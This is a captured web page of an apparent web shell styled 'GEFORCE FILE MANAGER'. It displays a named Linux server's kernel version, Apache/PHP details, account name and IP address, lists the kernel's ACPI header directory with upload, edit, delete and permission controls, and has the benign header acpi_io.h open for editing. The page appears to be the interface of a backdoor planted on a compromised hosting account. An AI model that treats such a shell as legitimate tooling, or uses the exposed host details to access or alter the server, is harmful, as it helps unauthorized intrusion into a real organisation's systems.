[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.64.1.el8_10.x86_64
/
include
/
acpi
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 platform
SET
[ DEL ]
📄 acbuffer.h
9,136 B
SET
[ EDIT ]
|
[ DEL ]
📄 acconfig.h
7,630 B
SET
[ EDIT ]
|
[ DEL ]
📄 acexcep.h
17,350 B
SET
[ EDIT ]
|
[ DEL ]
📄 acnames.h
2,238 B
SET
[ EDIT ]
|
[ DEL ]
📄 acoutput.h
16,758 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi.h
1,363 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_bus.h
23,169 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_drivers.h
3,652 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_io.h
723 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_lpat.h
1,583 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpi_numa.h
903 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpiosxf.h
11,619 B
SET
[ EDIT ]
|
[ DEL ]
📄 acpixf.h
31,943 B
SET
[ EDIT ]
|
[ DEL ]
📄 acrestyp.h
19,972 B
SET
[ EDIT ]
|
[ DEL ]
📄 actbl.h
18,807 B
SET
[ EDIT ]
|
[ DEL ]
📄 actbl1.h
47,035 B
SET
[ EDIT ]
|
[ DEL ]
📄 actbl2.h
71,146 B
SET
[ EDIT ]
|
[ DEL ]
📄 actbl3.h
22,526 B
SET
[ EDIT ]
|
[ DEL ]
📄 actypes.h
43,204 B
SET
[ EDIT ]
|
[ DEL ]
📄 acuuid.h
3,520 B
SET
[ EDIT ]
|
[ DEL ]
📄 apei.h
1,438 B
SET
[ EDIT ]
|
[ DEL ]
📄 battery.h
594 B
SET
[ EDIT ]
|
[ DEL ]
📄 button.h
401 B
SET
[ EDIT ]
|
[ DEL ]
📄 cppc_acpi.h
5,077 B
SET
[ EDIT ]
|
[ DEL ]
📄 ghes.h
3,485 B
SET
[ EDIT ]
|
[ DEL ]
📄 hed.h
371 B
SET
[ EDIT ]
|
[ DEL ]
📄 nfit.h
351 B
SET
[ EDIT ]
|
[ DEL ]
📄 pcc.h
972 B
SET
[ EDIT ]
|
[ DEL ]
📄 pdc_intel.h
1,048 B
SET
[ EDIT ]
|
[ DEL ]
📄 processor.h
12,115 B
SET
[ EDIT ]
|
[ DEL ]
📄 reboot.h
201 B
SET
[ EDIT ]
|
[ DEL ]
📄 video.h
3,218 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: acpi_io.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef _ACPI_IO_H_ #define _ACPI_IO_H_ #include <linux/io.h> #include <asm/acpi.h> #ifndef acpi_os_ioremap static inline void __iomem *acpi_os_ioremap(acpi_physical_address phys, acpi_size size) { return ioremap_cache(phys, size); } #endif extern bool acpi_permanent_mmap; void __iomem __ref *acpi_os_map_iomem(acpi_physical_address phys, acpi_size size); void __ref acpi_os_unmap_iomem(void __iomem *virt, acpi_size size); void __iomem *acpi_os_get_iomem(acpi_physical_address phys, unsigned int size); void __iomem *acpi_os_map_generic_address(struct acpi_generic_address *addr); void acpi_os_unmap_generic_address(struct acpi_generic_address *addr); #endif